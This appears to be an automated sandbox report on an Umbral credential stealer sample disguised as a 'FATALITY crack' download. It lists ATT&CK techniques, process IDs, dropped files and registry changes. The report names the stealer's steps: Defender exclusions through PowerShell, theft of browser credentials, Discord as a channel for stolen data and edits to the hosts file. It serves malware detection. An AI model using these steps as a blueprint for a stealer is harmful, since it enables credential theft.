umbral | hxxps://oxy[.]name/d/zBZh

Analysis

max time kernel
660s
max time network
661s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
04-08-2024 18:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://oxy.name/d/zBZh

Score

10^/10

umbral credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/memory/1204-1561-0x000001A70F9B0000-0x000001A70F9F0000-memory.dmp	family_umbral
behavioral1/files/0x000500000002acc4-1581.dat	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4160	powershell.exe
2092	powershell.exe
2088	powershell.exe
1248	powershell.exe
1908	powershell.exe
3132	powershell.exe
2148	powershell.exe
6188	powershell.exe
6352	powershell.exe
6908	powershell.exe
5256	powershell.exe
4900	powershell.exe
5992	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 5 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\CisUtMonitor.sys	UninstallTool.exe
File opened for modification	C:\Windows\system32\drivers\CisUtMonitor.sys	UninstallTool.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Fatality.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Fatality.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Fatality.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 13 IoCs

pid	Process
4320	uninstalltool_setup.exe
3752	uninstalltool_setup.tmp
5892	PinToTaskbar.exe
5196	UninstallTool.exe
2020	UninstallTool.exe
2904	UninstallTool.exe
5224	UninstallTool.exe
2356	UninstallTool.exe
5888	UninstallTool.exe
4948	UninstallToolHelper.exe
1204	Fatality.exe
5920	Fatality.exe
4612	Fatality.exe

Loads dropped DLL 4 IoCs

pid	Process
5548	regsvr32.exe
1572	regsvr32.exe
3248	Explorer.EXE
3248	Explorer.EXE

Modifies system executable filetype association 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\{FE8E6AD6-DABE-45E1-88C2-48DC4578924C}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\{FE8E6AD6-DABE-45E1-88C2-48DC4578924C}\ = "UTShellExt"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\{FE8E6AD6-DABE-45E1-88C2-48DC4578924C}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\{FE8E6AD6-DABE-45E1-88C2-48DC4578924C}\ = "UTShellExt"	regsvr32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
316	discord.com
317	discord.com
322	discord.com
338	discord.com
358	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
314	ip-api.com
316	ip-api.com
317	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF	chrome.exe

Drops file in Program Files directory 56 IoCs

description	ioc	Process
File created	C:\Program Files\Uninstall Tool\is-J3GN3.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\unins000.dat	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-3F4I1.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-1K9H4.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\unins000.msg	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-995DR.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-Q4KF6.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-L92DP.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-VQE1G.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\is-E9TEN.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-D8186.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\is-R1AGM.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-RGIVT.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\is-SUH91.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-09B45.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-UAT80.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-FN8VA.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-J6CIK.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-NPCO4.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-U537H.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-DOCHA.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-V7UNL.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-4MKBP.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-I0MHU.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-LA9GN.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-MJCU5.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-8AJBN.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\is-306UG.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\is-FSI33.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\is-BAR8S.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-16M1J.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-7631R.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-8TFFQ.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-SFNCD.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\is-HF9E1.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-DLVGM.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-ORB70.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-4130H.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-61SOL.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-DAH8Q.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\is-KEGMG.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\is-I90IR.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-9RV66.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-GE1R8.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-GO6V6.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-QDFBU.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-TS36T.tmp	uninstalltool_setup.tmp
File opened for modification	C:\Program Files\Uninstall Tool\UninstallTool.url	uninstalltool_setup.tmp
File opened for modification	C:\Program Files\Uninstall Tool\unins000.dat	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-228O5.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-CCQ4M.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-HK6BH.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-PMVB9.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-LGE4D.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-FKACM.tmp	uninstalltool_setup.tmp
File created	C:\Program Files\Uninstall Tool\languages\is-AUATI.tmp	uninstalltool_setup.tmp

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 3 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\7zO461FB6AF\Fatality.exe:Zone.Identifier	7zFM.exe
File opened for modification	C:\Users\Admin\Downloads\uninstalltool_setup.exe:Zone.Identifier	msedge.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zO461ABEEE\Fatality.exe:Zone.Identifier	7zFM.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	uninstalltool_setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	uninstalltool_setup.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UninstallToolHelper.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5192	cmd.exe
6040	PING.EXE
7140	cmd.exe
6152	PING.EXE
4640	cmd.exe
1508	PING.EXE

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2908	wmic.exe
1172	wmic.exe
7052	wmic.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies Internet Explorer settings 1 TTPs 6 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000\Software\Microsoft\Internet Explorer\Main	UninstallTool.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000\Software\Microsoft\Internet Explorer\Main\ImageStoreRandomFolder = "70obr57"	UninstallTool.exe
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133672713371721443"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202	UninstallTool.exe
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1	UninstallTool.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\{FE8E6AD6-DABE-45E1-88C2-48DC4578924C}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\{FE8E6AD6-DABE-45E1-88C2-48DC4578924C}	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	7zFM.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	UninstallTool.exe
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	OpenWith.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\{FE8E6AD6-DABE-45E1-88C2-48DC4578924C}\ = "UTShellExt"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 0100000000000000ffffffff	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	UninstallTool.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	UninstallTool.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	UninstallTool.exe
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	UninstallTool.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	UninstallTool.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	UninstallTool.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	UninstallTool.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8	UninstallTool.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell	Explorer.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FE8E6AD6-DABE-45E1-88C2-48DC4578924C}\InProcServer32\ = "C:\\Program Files\\Uninstall Tool\\UTShellExt_x86.dll"	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	UninstallTool.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 4a00310000000000f758eb0b100046495800380009000400efbe04594796045947962e000000b0ac020000000100000000000000000000000000000081eb9700460049005800000012000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	OpenWith.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FE8E6AD6-DABE-45E1-88C2-48DC4578924C}\InProcServer32\ThreadingModel = "Apartment"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9ce424a8-8388-495f-a400-2bd50eb35657}\InfoTip = "Uninstall Programs Completely. Install and Trace Software. Manage Startup Programs"	UninstallTool.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	UninstallTool.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Applications\7zFM.exe\shell\open	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	UninstallTool.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	UninstallTool.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1287768749-810021449-2672985988-1000\{95B85029-4E7D-4529-B973-13C0405CBF09}	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	UninstallTool.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	UninstallTool.exe

NTFS ADS 7 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\FATALITY crack.rar:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 288734.crdownload:SmartScreen	msedge.exe
